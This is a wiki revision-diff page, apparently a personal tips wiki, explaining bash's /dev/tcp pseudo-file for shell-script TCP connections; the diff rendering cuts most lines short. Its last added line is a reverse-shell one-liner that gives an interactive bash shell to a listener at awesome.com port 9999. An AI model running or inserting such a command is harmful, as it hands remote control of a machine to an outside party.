there_s_a_dev_file_for_tcp_connections
Differences
This shows you the differences between two versions of the page.
| Next revision | Previous revision | ||
| there_s_a_dev_file_for_tcp_connections [2010/06/21 05:59] – created tkbletsc | there_s_a_dev_file_for_tcp_connections [2010/09/02 15:12] (current) – tkbletsc | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | They' | + | It doesn' |
| / | / | ||
| Line 6: | Line 6: | ||
| To get a bidirectional TCP connection in shell script: | To get a bidirectional TCP connection in shell script: | ||
| - | echo 3 <> / | + | |
| + | | ||
| + | cat <& | ||
| + | |||
| + | To make an interactive bash shell appear for someone listening at awesome.com port 9999: | ||
| + | bash 0<> / | ||
there_s_a_dev_file_for_tcp_connections.1277125199.txt.gz · Last modified: by tkbletsc
